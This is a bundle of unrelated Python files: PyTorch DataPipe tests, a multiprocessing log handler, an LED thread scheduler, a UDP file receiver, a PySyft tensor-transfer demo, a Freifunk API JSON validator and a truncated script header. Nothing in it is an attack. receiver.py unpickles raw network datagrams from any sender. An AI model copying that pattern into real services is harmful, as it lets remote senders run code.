        # __len__ Test: number of batches, not number of elements
        self.assertEqual(6, len(batch_dp))
        self.assertEqual(2, len(batch_dp_2))
# Metaclass conflict for Python 3.6
# Multiple inheritance with NamedTuple is not supported for Python 3.9
_generic_namedtuple_allowed = sys.version_info >= (3, 7) and sys.version_info < (3, 9)
if _generic_namedtuple_allowed:
    # Generic NamedTuple used only to exercise the "not supported by Python
    # typing" error path in TestTyping.test_compile_time.
    class InvalidData(Generic[T_co], NamedTuple):
        name: str
        data: T_co
class TestTyping(TestCase):
    """Tests for the DataPipe typing helpers (issubtype / issubinstance) and the
    compile-time, construct-time and run-time type-enforcement machinery."""
    def test_subtype(self):
        """`issubtype` over basic types, constrained TypeVars, and subscripted generics."""
        from torch.utils.data._typing import issubtype
        basic_type = (int, str, bool, float, complex,
                      list, tuple, dict, set, T_co)
        # Every type is a subtype of itself and of Any; only T_co also absorbs Any.
        for t in basic_type:
            self.assertTrue(issubtype(t, t))
            self.assertTrue(issubtype(t, Any))
            if t == T_co:
                self.assertTrue(issubtype(Any, t))
            else:
                self.assertFalse(issubtype(Any, t))
        for t1, t2 in itertools.product(basic_type, basic_type):
            if t1 == t2 or t2 == T_co:
                self.assertTrue(issubtype(t1, t2))
            else:
                self.assertFalse(issubtype(t1, t2))
        T = TypeVar('T', int, str)
        S = TypeVar('S', bool, Union[str, int], Tuple[int, T])  # type: ignore[valid-type]
        # (subtype, supertype) pairs that must hold in exactly one direction.
        types = ((int, Optional[int]),
                 (List, Union[int, list]),
                 (Tuple[int, str], S),
                 (Tuple[int, str], tuple),
                 (T, S),
                 (S, T_co),
                 (T, Union[S, Set]))
        for sub, par in types:
            self.assertTrue(issubtype(sub, par))
            self.assertFalse(issubtype(par, sub))
        subscriptable_types = {
            List: 1,
            Tuple: 2,  # use 2 parameters
            Set: 1,
            Dict: 2,
        }
        for subscript_type, n in subscriptable_types.items():
            for ts in itertools.combinations(types, n):
                subs, pars = zip(*ts)
                sub = subscript_type[subs]  # type: ignore[index]
                par = subscript_type[pars]  # type: ignore[index]
                self.assertTrue(issubtype(sub, par))
                self.assertFalse(issubtype(par, sub))
                # Non-recursive check: only the outer container is compared,
                # so the reverse direction passes here.
                self.assertTrue(issubtype(par, sub, recursive=False))
    def test_issubinstance(self):
        """`issubinstance` for scalars, lists/sets, dicts, and tuples."""
        from torch.utils.data._typing import issubinstance
        basic_data = (1, '1', True, 1., complex(1., 0.))
        basic_type = (int, str, bool, float, complex)
        S = TypeVar('S', bool, Union[str, int])
        for d in basic_data:
            self.assertTrue(issubinstance(d, Any))
            self.assertTrue(issubinstance(d, T_co))
            # S is constrained to bool | (str | int); floats/complex fall outside it.
            if type(d) in (bool, int, str):
                self.assertTrue(issubinstance(d, S))
            else:
                self.assertFalse(issubinstance(d, S))
            for t in basic_type:
                if type(d) == t:
                    self.assertTrue(issubinstance(d, t))
                else:
                    self.assertFalse(issubinstance(d, t))
        # list/set
        dt = (([1, '1', 2], List), (set({1, '1', 2}), Set))
        for d, t in dt:
            self.assertTrue(issubinstance(d, t))
            self.assertTrue(issubinstance(d, t[T_co]))  # type: ignore[index]
            self.assertFalse(issubinstance(d, t[int]))  # type: ignore[index]
        # dict
        d = dict({'1': 1, '2': 2.})
        self.assertTrue(issubinstance(d, Dict))
        self.assertTrue(issubinstance(d, Dict[str, T_co]))
        self.assertFalse(issubinstance(d, Dict[str, int]))
        # tuple
        d = (1, '1', 2)
        self.assertTrue(issubinstance(d, Tuple))
        self.assertTrue(issubinstance(d, Tuple[int, str, T_co]))
        self.assertFalse(issubinstance(d, Tuple[int, Any]))
        self.assertFalse(issubinstance(d, Tuple[int, int, int]))
    # Static checking annotation
    def test_compile_time(self):
        """Class-creation-time validation of `__iter__` return annotations."""
        with self.assertRaisesRegex(TypeError, r"Expected 'Iterator' as the return"):
            class InvalidDP1(IterDataPipe[int]):
                def __iter__(self) -> str:  # type: ignore[misc, override]
                    yield 0
        with self.assertRaisesRegex(TypeError, r"Expected return type of '__iter__'"):
            class InvalidDP2(IterDataPipe[Tuple]):
                def __iter__(self) -> Iterator[int]:  # type: ignore[override]
                    yield 0
        with self.assertRaisesRegex(TypeError, r"Expected return type of '__iter__'"):
            class InvalidDP3(IterDataPipe[Tuple[int, str]]):
                def __iter__(self) -> Iterator[tuple]:  # type: ignore[override]
                    yield (0, )
        if _generic_namedtuple_allowed:
            with self.assertRaisesRegex(TypeError, r"is not supported by Python typing"):
                class InvalidDP4(IterDataPipe["InvalidData[int]"]):  # type: ignore[type-arg, misc]
                    pass
        class DP1(IterDataPipe[Tuple[int, str]]):
            def __init__(self, length):
                self.length = length
            def __iter__(self) -> Iterator[Tuple[int, str]]:
                for d in range(self.length):
                    yield d, str(d)
        self.assertTrue(issubclass(DP1, IterDataPipe))
        dp1 = DP1(10)
        # Instance type equals the class-declared type (mutual subtyping).
        self.assertTrue(DP1.type.issubtype(dp1.type) and dp1.type.issubtype(DP1.type))
        dp1_ = DP1(5)
        self.assertEqual(dp1.type, dp1_.type)
        with self.assertRaisesRegex(TypeError, r"is not a generic class"):
            class InvalidDP5(DP1[tuple]):  # type: ignore[type-arg]
                def __iter__(self) -> Iterator[tuple]:  # type: ignore[override]
                    yield (0, )
        class DP2(IterDataPipe[T_co]):
            def __iter__(self) -> Iterator[T_co]:
                for d in range(10):
                    yield d  # type: ignore[misc]
        self.assertTrue(issubclass(DP2, IterDataPipe))
        dp2 = DP2()  # type: ignore[var-annotated]
        self.assertTrue(DP2.type.issubtype(dp2.type) and dp2.type.issubtype(DP2.type))
        dp2_ = DP2()  # type: ignore[var-annotated]
        self.assertEqual(dp2.type, dp2_.type)
        class DP3(IterDataPipe[Tuple[T_co, str]]):
            r""" DataPipe without fixed type with __init__ function"""
            def __init__(self, datasource):
                self.datasource = datasource
            def __iter__(self) -> Iterator[Tuple[T_co, str]]:
                for d in self.datasource:
                    yield d, str(d)
        self.assertTrue(issubclass(DP3, IterDataPipe))
        dp3 = DP3(range(10))  # type: ignore[var-annotated]
        self.assertTrue(DP3.type.issubtype(dp3.type) and dp3.type.issubtype(DP3.type))
        dp3_ = DP3(5)  # type: ignore[var-annotated]
        self.assertEqual(dp3.type, dp3_.type)
        class DP4(IterDataPipe[tuple]):
            r""" DataPipe without __iter__ annotation"""
            def __iter__(self):
                raise NotImplementedError
        self.assertTrue(issubclass(DP4, IterDataPipe))
        dp4 = DP4()
        self.assertTrue(dp4.type.param == tuple)
        class DP5(IterDataPipe):
            r""" DataPipe without type annotation"""
            def __iter__(self) -> Iterator[str]:
                raise NotImplementedError
        self.assertTrue(issubclass(DP5, IterDataPipe))
        dp5 = DP5()
        from torch.utils.data._typing import issubtype
        # Unparameterized DataPipe: its type parameter is equivalent to Any.
        self.assertTrue(issubtype(dp5.type.param, Any) and issubtype(Any, dp5.type.param))
        class DP6(IterDataPipe[int]):
            r""" DataPipe with plain Iterator"""
            def __iter__(self) -> Iterator:
                raise NotImplementedError
        self.assertTrue(issubclass(DP6, IterDataPipe))
        dp6 = DP6()
        self.assertTrue(dp6.type.param == int)
        class DP7(IterDataPipe[Awaitable[T_co]]):
            r""" DataPipe with abstract base class"""
        self.assertTrue(issubclass(DP7, IterDataPipe))
        self.assertTrue(DP7.type.param == Awaitable[T_co])
        class DP8(DP7[str]):
            r""" DataPipe subclass from a DataPipe with abc type"""
        self.assertTrue(issubclass(DP8, IterDataPipe))
        self.assertTrue(DP8.type.param == Awaitable[str])
    def test_construct_time(self):
        """@argument_validation checks DataPipe-typed arguments at construction time."""
        class DP0(IterDataPipe[Tuple]):
            @argument_validation
            def __init__(self, dp: IterDataPipe):
                self.dp = dp
            def __iter__(self) -> Iterator[Tuple]:
                for d in self.dp:
                    yield d, str(d)
        class DP1(IterDataPipe[int]):
            @argument_validation
            def __init__(self, dp: IterDataPipe[Tuple[int, str]]):
                self.dp = dp
            def __iter__(self) -> Iterator[int]:
                for a, b in self.dp:
                    yield a
        # Non-DataPipe input with DataPipe hint
        datasource = [(1, '1'), (2, '2'), (3, '3')]
        with self.assertRaisesRegex(TypeError, r"Expected argument 'dp' as a IterDataPipe"):
            dp0 = DP0(datasource)
        dp0 = DP0(dp.iter.IterableWrapper(range(10)))
        # dp0 yields Tuple, not Tuple[int, str] — rejected by DP1's annotation.
        with self.assertRaisesRegex(TypeError, r"Expected type of argument 'dp' as a subtype"):
            dp1 = DP1(dp0)
    def test_runtime(self):
        """@runtime_validation checks each yielded item against the declared type."""
        class DP(IterDataPipe[Tuple[int, T_co]]):
            def __init__(self, datasource):
                self.ds = datasource
            @runtime_validation
            def __iter__(self) -> Iterator[Tuple[int, T_co]]:
                for d in self.ds:
                    yield d
        dss = ([(1, '1'), (2, '2')],
               [(1, 1), (2, '2')])
        for ds in dss:
            dp0 = DP(ds)  # type: ignore[var-annotated]
            self.assertEqual(list(dp0), ds)
            # Reset __iter__
            self.assertEqual(list(dp0), ds)
        dss = ([(1, 1), ('2', 2)],  # type: ignore[assignment, list-item]
               [[1, '1'], [2, '2']],  # type: ignore[list-item]
               [1, '1', 2, '2'])
        for ds in dss:
            dp0 = DP(ds)
            with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
                list(dp0)
            # Context manager disables validation; nesting must also work.
            with runtime_validation_disabled():
                self.assertEqual(list(dp0), ds)
                with runtime_validation_disabled():
                    self.assertEqual(list(dp0), ds)
            # Validation is re-enabled once the context manager exits.
            with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
                list(dp0)
    def test_reinforce(self):
        """reinforce_type narrows a TypeVar-typed DataPipe and is itself validated."""
        T = TypeVar('T', int, str)
        class DP(IterDataPipe[T]):
            def __init__(self, ds):
                self.ds = ds
            @runtime_validation
            def __iter__(self) -> Iterator[T]:
                for d in self.ds:
                    yield d
        ds = list(range(10))
        # Valid type reinforcement
        dp0 = DP(ds).reinforce_type(int)
        self.assertTrue(dp0.type, int)
        self.assertEqual(list(dp0), ds)
        # Invalid type
        with self.assertRaisesRegex(TypeError, r"'expected_type' must be a type"):
            dp1 = DP(ds).reinforce_type(1)
        # Type is not subtype
        with self.assertRaisesRegex(TypeError, r"Expected 'expected_type' as subtype of"):
            dp2 = DP(ds).reinforce_type(float)
        # Invalid data at runtime
        dp3 = DP(ds).reinforce_type(str)
        with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
            list(dp3)
        # Context Manager to disable the runtime validation
        with runtime_validation_disabled():
            self.assertEqual(list(d for d in dp3), ds)
class NumbersDataset(IterDataPipe):
    """Minimal IterDataPipe that yields the integers 0 .. size-1 (default size=10)."""
    def __init__(self, size=10):
        # Number of integers produced on each iteration pass.
        self.size = size
    def __iter__(self):
        # Equivalent to `for i in range(self.size): yield i`.
        yield from range(self.size)
class TestGraph(TestCase):
    """Tests for torch.utils.data.graph.traverse over DataPipe graphs."""
    @skipIfNoDill
    def test_simple_traverse(self):
        """A single map over a source pipe traverses to a two-node graph."""
        numbers_dp = NumbersDataset(size=50)
        mapped_dp = numbers_dp.map(lambda x: x * 10)
        graph = torch.utils.data.graph.traverse(mapped_dp)
        # Graph is a nested dict keyed by the DataPipe instances themselves.
        expected: Dict[Any, Any] = {mapped_dp: {numbers_dp: {}}}
        self.assertEqual(expected, graph)
    @skipIfNoDill
    def test_traverse_forked(self):
        """Forked branches report their shared parent chain via `.main_datapipe`."""
        numbers_dp = NumbersDataset(size=50)
        dp0, dp1, dp2 = numbers_dp.fork(num_instances=3)
        dp0_upd = dp0.map(lambda x: x * 10)
        dp1_upd = dp1.filter(lambda x: x % 3 == 1)
        combined_dp = dp0_upd.mux(dp1_upd, dp2)
        graph = torch.utils.data.graph.traverse(combined_dp)
        # Each fork child exposes the fork's internal pipe (main_datapipe) and,
        # through it, the original source (main_datapipe.main_datapipe).
        expected = {combined_dp: {dp0_upd: {dp0: {dp0.main_datapipe: {dp0.main_datapipe.main_datapipe: {}}}},
                                  dp1_upd: {dp1: {dp1.main_datapipe: {dp1.main_datapipe.main_datapipe: {}}}},
                                  dp2: {dp2.main_datapipe: {dp2.main_datapipe.main_datapipe: {}}}}}
        self.assertEqual(expected, graph)
class TestSharding(TestCase):
    """Tests for sharding_filter / apply_sharding over DataPipe pipelines."""
    def _get_pipeline(self):
        # Small forked + muxed pipeline shared by the tests below.
        numbers_dp = NumbersDataset(size=10)
        dp0, dp1 = numbers_dp.fork(num_instances=2)
        dp0_upd = dp0.map(lambda x: x * 10)
        dp1_upd = dp1.filter(lambda x: x % 3 == 1)
        combined_dp = dp0_upd.mux(dp1_upd)
        return combined_dp
    @skipIfNoDill
    def test_simple_sharding(self):
        """Each shard sees a fixed subset; all shards together cover every item."""
        sharded_dp = self._get_pipeline().sharding_filter()
        torch.utils.data.sharding.apply_sharding(sharded_dp, 3, 1)
        items = list(sharded_dp)
        self.assertEqual([1, 20, 40, 70], items)
        # Union of all three shards must equal the unsharded pipeline's output.
        all_items = list(self._get_pipeline())
        items = []
        for i in range(3):
            sharded_dp = self._get_pipeline().sharding_filter()
            torch.utils.data.sharding.apply_sharding(sharded_dp, 3, i)
            items += list(sharded_dp)
        self.assertEqual(sorted(all_items), sorted(items))
    def test_sharding_length(self):
        """len() of a sharded pipe accounts for uneven division of elements."""
        numbers_dp = dp.iter.IterableWrapper(range(13))
        sharded_dp0 = numbers_dp.sharding_filter()
        torch.utils.data.sharding.apply_sharding(sharded_dp0, 3, 0)
        sharded_dp1 = numbers_dp.sharding_filter()
        torch.utils.data.sharding.apply_sharding(sharded_dp1, 3, 1)
        sharded_dp2 = numbers_dp.sharding_filter()
        torch.utils.data.sharding.apply_sharding(sharded_dp2, 3, 2)
        self.assertEqual(13, len(numbers_dp))
        # 13 items over 3 shards -> 5/4/4 (shard 0 receives the remainder).
        self.assertEqual(5, len(sharded_dp0))
        self.assertEqual(4, len(sharded_dp1))
        self.assertEqual(4, len(sharded_dp2))
        # Degenerate case: more shards than items.
        numbers_dp = dp.iter.IterableWrapper(range(1))
        sharded_dp0 = numbers_dp.sharding_filter()
        torch.utils.data.sharding.apply_sharding(sharded_dp0, 2, 0)
        sharded_dp1 = numbers_dp.sharding_filter()
        torch.utils.data.sharding.apply_sharding(sharded_dp1, 2, 1)
        self.assertEqual(1, len(sharded_dp0))
        self.assertEqual(0, len(sharded_dp1))
    @skipIfNoDill
    def test_old_dataloader(self):
        """Sharded pipeline under the classic DataLoader yields the same multiset."""
        dp0 = self._get_pipeline()
        expected = list(dp0)
        dp0 = self._get_pipeline().sharding_filter()
        # worker_init_fn applies per-worker sharding inside each DataLoader worker.
        dl = DataLoader(dp0, batch_size=1, shuffle=False, num_workers=2,
                        worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
        items = []
        for i in dl:
            items.append(i)
        self.assertEqual(sorted(expected), sorted(items))
# Standard PyTorch test entry point.
if __name__ == '__main__':
    run_tests()
|
multiprocessing_logging.py
|
# vim : fileencoding=UTF-8 :
from __future__ import absolute_import, division, unicode_literals
import logging
import multiprocessing
import sys
import threading
import traceback
__version__ = '0.2.4'
def install_mp_handler(logger=None):
    """Replace every handler on the given Logger with a queue-backed
    MultiProcessingHandler wrapping the original.

    :param logger: whose handlers to wrap. By default, the root logger.
    """
    if logger is None:
        logger = logging.getLogger()
    # Snapshot the handler list with list(); it is mutated while we iterate.
    for index, existing in enumerate(list(logger.handlers)):
        wrapped = MultiProcessingHandler(
            'mp-handler-{0}'.format(index), sub_handler=existing)
        logger.removeHandler(existing)
        logger.addHandler(wrapped)
class MultiProcessingHandler(logging.Handler):
    """logging.Handler that forwards records safely across process boundaries.

    Records emitted in any process are serialized onto a multiprocessing queue;
    a daemon thread in the creating process drains the queue and hands each
    record to the wrapped ``sub_handler`` for actual output.
    """
    def __init__(self, name, sub_handler=None):
        """
        :param name: name given to the background receiver thread.
        :param sub_handler: handler that performs the real output; defaults to
            a ``logging.StreamHandler``.
        """
        super(MultiProcessingHandler, self).__init__()
        if sub_handler is None:
            sub_handler = logging.StreamHandler()
        self.sub_handler = sub_handler
        # Unbounded queue shared with child processes.
        self.queue = multiprocessing.Queue(-1)
        # Mirror the wrapped handler's level/formatter so filtering matches.
        self.setLevel(self.sub_handler.level)
        self.setFormatter(self.sub_handler.formatter)
        # The thread handles receiving records asynchronously.
        t = threading.Thread(target=self.receive, name=name)
        t.daemon = True
        t.start()
    def setFormatter(self, fmt):
        # Keep this handler's formatter and the wrapped handler's in sync.
        logging.Handler.setFormatter(self, fmt)
        self.sub_handler.setFormatter(fmt)
    def receive(self):
        """Drain the queue forever, emitting each record on the wrapped handler."""
        while True:
            try:
                record = self.queue.get()
                self.sub_handler.emit(record)
            except (KeyboardInterrupt, SystemExit):
                raise
            except EOFError:
                # Queue pipe closed (e.g. interpreter shutdown): stop draining.
                break
            except Exception:  # was a bare `except:`; don't mask BaseExceptions
                traceback.print_exc(file=sys.stderr)
    def send(self, s):
        # Non-blocking put: the queue is unbounded so this should never block.
        self.queue.put_nowait(s)
    def _format_record(self, record):
        # ensure that exc_info and args
        # have been stringified. Removes any chance of
        # unpickleable things inside and possibly reduces
        # message size sent over the pipe.
        if record.args:
            record.msg = record.msg % record.args
            record.args = None
        if record.exc_info:
            # format() renders exc_info into record.exc_text as a side effect.
            self.format(record)
            record.exc_info = None
        return record
    def emit(self, record):
        """Pre-format the record and push it onto the shared queue."""
        try:
            s = self._format_record(record)
            self.send(s)
        except (KeyboardInterrupt, SystemExit):
            raise
        except Exception:  # was a bare `except:`; don't mask BaseExceptions
            self.handleError(record)
    def close(self):
        self.sub_handler.close()
        logging.Handler.close(self)
|
threadScheduler.py
|
import threading
import os.path
import time
import config
from LED_Sequences import * # Import all sequences
from LED_Controller import RenderLoop
import json
def PollLEDSequence(path):
    """
    Repeatedly read the LED_Sequence file to see which mode is selected and
    start the matching sequence thread on the requested layer.

    :param path: directory containing the ``LED_Sequence`` control file.
    """
    filePath = path + "LED_Sequence"
    while config.run:
        with open(filePath, 'r') as f:
            jsonStringInput = f.read()
        # Parse json input
        jsonDict = None
        try:
            jsonDict = json.loads(jsonStringInput)
        except ValueError:
            # Check for exit condition
            if jsonStringInput == "exit":
                exit()  # Call to: LED_Sequences.exit()
            jsonCorrect = False
        else:
            # BUGFIX: previously jsonCorrect kept its value from the prior
            # iteration whenever a key was missing; compute it fresh each pass.
            jsonCorrect = "sequence" in jsonDict and "layer" in jsonDict
        if jsonCorrect:
            # Input parsed properly. Perform actions.
            try:
                localLayer = int(jsonDict["layer"])
                localfunc = globals()[jsonDict["sequence"]]
            except ValueError:
                # Layer element cannot be parsed to an int
                pass
            except KeyError:
                # Function does not exist for that sequence name
                pass
            else:
                # Bound the layer to the valid range [0, NUM_LAYERS - 1]
                localLayer = max(localLayer, 0)  # Set Min
                localLayer = min(localLayer, config.NUM_LAYERS - 1)  # Set Max
                localSequence = jsonDict["sequence"]
                # Perform actions only if the layer needs changing
                if localSequence != config.layerManager[localLayer]["sequence"]:
                    # Stop existing threads on the given layer
                    CloseThread(localLayer)
                    # Start new sequence on the given layer (single assignment;
                    # the original redundantly set "sequence" twice)
                    config.layerManager[localLayer]["sequence"] = localSequence
                    print(f'New sequence selected: <{config.layerManager[localLayer]["sequence"]}>')
                    config.layerManager[localLayer]["run"] = True
                    config.layerManager[localLayer]["thread"] = threading.Thread(
                        target=localfunc, name=f'THREAD_{localSequence}', args=(jsonDict,), daemon=True)
                    config.layerManager[localLayer]["thread"].start()
                # else:
                #     print(f'Continuing sequence: <{LEDSequence}>')
        else:
            print(f"Invalid JSON: {jsonStringInput}")
        time.sleep(1)
    print("exiting PollLEDSequence thread")
def CloseThread(layer):
    """Stop the sequence thread running on *layer* (if any) and blank its pixels."""
    current = config.layerManager[layer]["thread"]
    if current is None:
        return
    print(f'Poll closing thread: <{current.name}>')
    # Signal the sequence loop to stop, then wait for it to finish.
    config.layerManager[layer]["run"] = False
    current.join()
    # Clear the pixels of the finished layer, under that layer's lock.
    config.stripLayersLocks[layer].acquire()
    config.stripLayers[layer] = [None] * config.NUM_PIXELS
    config.stripLayersLocks[layer].release()
    config.layerManager[layer]["thread"] = None
if __name__ == "__main__":
    # creating threads
    primaryThreads = []
    # Thread to poll Sequence file to begin other threads
    primaryThreads.append(threading.Thread(
        target=PollLEDSequence, name='THREAD_Poll', args=('../transfer/',), daemon=True))
    # Thread to render the virtual pixel values to the physical strip
    primaryThreads.append(threading.Thread(
        target=RenderLoop, name='THREAD_Render', args=(), daemon=True))
    # starting primary threads
    for t in primaryThreads:
        t.start()
    # Continue along main thread
    curpath = os.path.abspath(os.curdir)
    print("Current path is: %s" % (curpath))
    # Busy-wait until config.run is cleared; the keyboard-input handling
    # below is currently disabled (kept for reference).
    while config.run:
        # i = input("Enter text ('exit' to quit): ")
        # print(f'Input received: <{i}>')
        # if not i:
        #     break
        # with open("../transfer/LED_Sequence", "w") as f:
        #     f.write(i)
        pass
    print("Keyboard loop has exited")
    # Shut down every per-layer sequence thread cleanly.
    for layer in config.layerManager:
        if layer["thread"] is not None:
            print(f'Closing layer {config.layerManager.index(layer)} thread: {layer["thread"].name}')
            layer["run"] = False
            layer["thread"].join()
            layer["thread"] = None
            layer["sequence"] = ''
    config.run = False
    # wait until primary threads are completely executed
    for t in primaryThreads:
        t.join()
    # Clear the current sequence
    with open("../transfer/LED_Sequence", "w") as f:
        f.write('')
    # All threads completely executed
    print("Goodbye!")
|
receiver.py
|
import pickle
import socket
import random
import threading
from Utils import Config, RecvLogConfig, CRC
recv_config = Config()  # load the configuration file
recv_log_config = RecvLogConfig()  # load the logging configuration
recv_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # server-side UDP socket
recv_socket.bind(recv_config.recv_addr)
recv_file = open(recv_config.recv_file, 'wb')  # open output file in binary write mode (created if absent)
# Decide whether to simulate losing the incoming frame.
def should_lost():
    """Return True with probability 1/lost_rate, simulating datagram loss."""
    global recv_config
    # randint(1, lost_rate) equals lost_rate once in every lost_rate draws;
    # the original `True if ... else False` ternary around this was redundant.
    return random.randint(1, recv_config.lost_rate) == recv_config.lost_rate
# Receive data frames (PDUs) from the sender.
def receive_pdu():
    """Receive PDUs over UDP, ACK in-order frames, and append payloads to recv_file.

    Loops until a frame with an empty payload marks end-of-transfer.
    NOTE(review): relies on module globals set up at import time (socket, file,
    config objects).
    """
    global recv_config
    global recv_log_config
    global recv_socket
    global recv_file
    recv_log = open(recv_config.recv_log, 'w')  # create the log file
    while True:
        pdu, send_addr = recv_socket.recvfrom(recv_config.data_size * 2)  # receive one frame
        if should_lost():  # simulated frame loss: silently drop it
            continue
        else:  # frame was not lost
            recv_log_config.num_to_recv += 1  # bump the receive counter
            pdu = pickle.loads(pdu)  # deserialize the frame
            recv_log_config.pdu_recv = pdu['pdu_to_send']  # sequence number of the received PDU
            if CRC().calculate(pdu['data']) != int(pdu['checksum']):  # payload corrupted
                recv_log_config.status = 'DataErr'
                log = recv_log_config.get_log()  # build the log line
                print(log)
            else:  # payload intact
                if recv_log_config.pdu_exp != pdu['pdu_to_send']:  # unexpected sequence number
                    recv_log_config.status = 'NoErr'
                    log = recv_log_config.get_log()  # build the log line
                    print(log)
                else:  # received in order
                    recv_log_config.status = 'OK'
                    log = recv_log_config.get_log()  # build the log line
                    print(log)
                    ack = recv_log_config.pdu_exp  # ACK value to send back
                    threading.Thread(target=send_ack, args=(pickle.dumps(ack), send_addr)).start()  # send the ACK
                    if len(pdu['data']) == 0:  # empty payload: transfer complete
                        recv_file.close()
                        print('receive complete')
                        recv_log.write('receive complete\n')
                        recv_log.close()
                        return
                    recv_file.write(pdu['data'])  # append the payload to the output file
                    recv_log_config.pdu_exp += 1
            recv_log.write(log + '\n')  # persist the log line
# Send an ACK back to the sender.
def send_ack(ack, send_addr):
    """Send the (already pickled) *ack* datagram to *send_addr* via the receiver socket."""
    global recv_socket
    recv_socket.sendto(ack, send_addr)
# Script entry point: run the receive loop until the transfer completes.
if __name__ == '__main__':
    receive_pdu()
|
send_tensor.py
|
# stdlib
import multiprocessing as mp
from multiprocessing import Process
import time
# third party
import torch as th
# syft absolute
import syft as sy
# Use "spawn" so each child process starts a fresh interpreter (avoids
# fork-related issues with torch/asyncio state).
mp.set_start_method("spawn", force=True)
# Make sure to run the local network.py server first:
#
# $ syft-network
#
def do() -> None:
    """Data-owner process: publish a large tensor on a loopback Duet and serve forever."""
    # stdlib
    import asyncio
    loop = asyncio.new_event_loop()
    # NOTE(review): asyncio._set_running_loop is a private API — confirm it still
    # exists in the interpreter version in use.
    asyncio._set_running_loop(loop)
    _ = sy.logger.add(
        sink="syft_do.log",
        level="TRACE",
    )
    duet = sy.launch_duet(loopback=True, network_url="http://localhost:5000")
    # Auto-accept any incoming object request named "gimme".
    duet.requests.add_handler(action="accept", name="gimme")
    t = th.randn(4000000)
    print("DO: Tensor sum:", t.sum())
    start = time.time()
    # searchable=True makes the tensor visible in the Duet store for the peer.
    tp = t.send(duet, searchable=True)
    end = time.time()
    print("DO: Pointer: ", tp, "serialized in", end - start)
    print("DO: Store: ", duet.store)
    # Block forever so the data-scientist process can fetch the tensor.
    loop.run_forever()
    print("DO: DONE")
def ds() -> None:
    """Data-scientist process: join the loopback Duet and fetch the shared tensor."""
    # stdlib
    import asyncio
    loop = asyncio.new_event_loop()
    # NOTE(review): asyncio._set_running_loop is a private API — confirm it still
    # exists in the interpreter version in use.
    asyncio._set_running_loop(loop)
    _ = sy.logger.add(
        sink="syft_ds.log",
        level="TRACE",
    )
    duet = sy.join_duet(loopback=True, network_url="http://localhost:5000")
    # Give the data-owner process a moment to publish its tensor.
    time.sleep(1)
    print("DS: Store: ", duet.store)
    start = time.time()
    # Blocking request; the owner's "gimme" handler auto-accepts it.
    t = duet.store[0].get(
        request_block=True, timeout_secs=30, name="gimme", delete_obj=False
    )
    end = time.time()
    print("DS: Received in:", end - start)
    print("DS: Shape: ", t.shape)
    print("DS: Tensor sum:", t.sum())
# Run data-owner and data-scientist in separate processes; once the scientist
# has fetched the tensor, tear the owner (which serves forever) down.
if __name__ == "__main__":
    p1 = Process(target=do)
    p1.start()
    p2 = Process(target=ds)
    p2.start()
    p2.join()
    p1.terminate()
|
test.py
|
#!/usr/bin/python2
import sys
import json
import urllib2
import threading
import Queue
import glob
import os
import jsonschema
# Browser-like HTTP headers sent with every fetch; some community servers
# reject requests without a realistic User-Agent.
hdr = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
       'Accept': 'application/json,text/javascript,application/jsonrequest;q=0.9,*/*;q=0.8',
       'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
       'Accept-Encoding': 'none',
       'Content-Type': 'application/json',
       'Connection': 'keep-alive' }
# api version -> parsed JSON spec, filled from ./api.freifunk.net/specs/*.json in main()
ff_api_specs = {}
def read_url(url, queue):
    """Fetch *url*, validate its JSON body against the matching API schema, and
    put the URL on *queue* if validation (or the fetch) failed.

    Python 2 code (urllib2 / Queue); only failing URLs are enqueued.
    """
    req = urllib2.Request(url, headers=hdr)
    try:
        res = urllib2.urlopen(req, None, 10)  # 10 s timeout
        api_content = {}
        api_content = json.loads(res.read())
        # Pick the jsonschema validator class matching the spec's declared draft,
        # verify the spec itself is well-formed, then validate the fetched body.
        validator = jsonschema.validators.validator_for(ff_api_specs[api_content['api']]['schema'])
        validator.check_schema(ff_api_specs[api_content['api']]['schema'])
        v = validator(ff_api_specs[api_content['api']]['schema'])
        result = v.iter_errors(api_content)
        has_error = False
        text_result = ''
        # Collect all validation errors into one report block.
        for error in sorted(result,key=str):
            if not has_error:
                text_result = 'ValidationError in community file %s:\n' % (api_content['name'])
                has_error = True
            text_result = '%s\t Error in %s: %s\n' % (text_result, '->'.join(str(path) for path in error.path), error.message)
        if has_error:
            text_result = '%s\t Url: %s\n' %(text_result, url)
            print(text_result)
            queue.put(url)
    except urllib2.HTTPError as e:
        print('HTTPError: %s: %s' % (e.code, url))
        queue.put(url)
    except urllib2.URLError as e:
        print('URLError: %s: %s' % (e.reason, url))
        queue.put(url)
    except ValueError as e:
        print('Value error while paring JSON: %s' % (url))
        queue.put(url)
    except KeyError as e:
        # NOTE(review): if the body lacked an 'api' key, this lookup raises
        # KeyError again inside the handler — confirm this is intended.
        print('Invalid or unknown API version %s: %s' % (api_content['api'], url))
        queue.put(url)
    # else:
    #     print 'OK %s: %s' % (api_content['api'], url)
def fetch_parallel(urls_to_load):
    """Validate every URL concurrently; return a queue holding the failing URLs."""
    failures = Queue.Queue()
    workers = [threading.Thread(target=read_url, args=(url, failures))
               for url in urls_to_load]
    for worker in workers:
        worker.start()
    # Wait for every fetch/validation to finish before reporting.
    for worker in workers:
        worker.join()
    return failures
def main():
    """Validate every community URL listed in directory.json against the API
    JSON schemas under ./api.freifunk.net/specs/ and exit 0/1 accordingly."""
    # `with` blocks close the files promptly (the original leaked the handles);
    # the unused `invalid_urls` local was removed.
    with open('./directory.json') as fd:
        obj = json.loads(fd.read())
    spec_dir = './api.freifunk.net/specs/*.json'
    spec_files = glob.glob(spec_dir)
    # Key each spec by its filename stem, which doubles as the API version id.
    for spec_file in spec_files:
        with open(spec_file) as fd:
            ff_api_specs[os.path.splitext(os.path.basename(spec_file))[0]] = json.loads(fd.read())
    urls_to_load = [obj[x] for x in obj]
    result = fetch_parallel(urls_to_load)
    # fetch_parallel enqueues only failing URLs, so an empty queue means success.
    if result.empty():
        print('Result: All URLs are valid :-)')
        sys.exit(0)
    else:
        print('\nResult: Invalid URLs found :-(')
        sys.exit(1)
# Script entry point.
if __name__ == '__main__':
    main()
|
confirm-rate.py
|
from pyblt import *
import random
import gc
import math
import csv
from multiprocessing import Process, Lock
import os
